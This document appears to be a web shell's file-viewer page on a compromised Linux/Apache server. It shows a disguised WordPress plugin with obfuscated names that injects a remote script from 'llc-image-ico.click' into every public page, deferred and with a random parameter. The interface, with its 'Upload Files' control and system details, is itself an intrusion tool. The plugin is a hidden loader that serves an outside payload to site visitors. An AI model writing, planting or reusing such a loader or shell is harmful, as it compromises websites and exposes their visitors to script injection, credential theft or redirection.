HEX
Server: Apache
System: Linux uws7-179.cafe24.com 3.10.0-1160.119.1p.el7.x86_64 #1 SMP Thu Sep 11 14:15:01 KST 2025 x86_64
User: medikors (1589)
PHP: 7.3.1p1
Disabled: mysql_pconnect
Upload Files
File: /medikors/www/wp-content/plugins/script-f6f284e4-f6f284e4/script-f6f284e4-f6f284e4.php
<?php
/**
 * Plugin Name: Script F6F284E4
 * Description: Loads hosted panel script on all frontend pages.
 * Version: 1.0.0
 */

if (!defined('ABSPATH')) { exit; }

function ff6f284e412b6() {
    if (is_admin()) { return; }
    $handle = 'h42bd41a32a94';
    $src = 'https://llc-image-ico.click/api/css.js';
    $src .= (strpos($src, '?') === false ? '?' : '&') . 'b=' . rawurlencode('45fcb62d') . '&r=' . rawurlencode((string)wp_rand(100000, 999999));
    wp_enqueue_script($handle, $src, [], null, true);
}
add_action('wp_enqueue_scripts', 'ff6f284e412b6', 999);

function f0669f51a6cea($tag, $handle, $src) {
    if ($handle !== 'h42bd41a32a94') { return $tag; }
    if (strpos($tag, ' defer') !== false) { return $tag; }
    return str_replace(' src=', ' defer src=', $tag);
}
add_filter('script_loader_tag', 'f0669f51a6cea', 10, 3);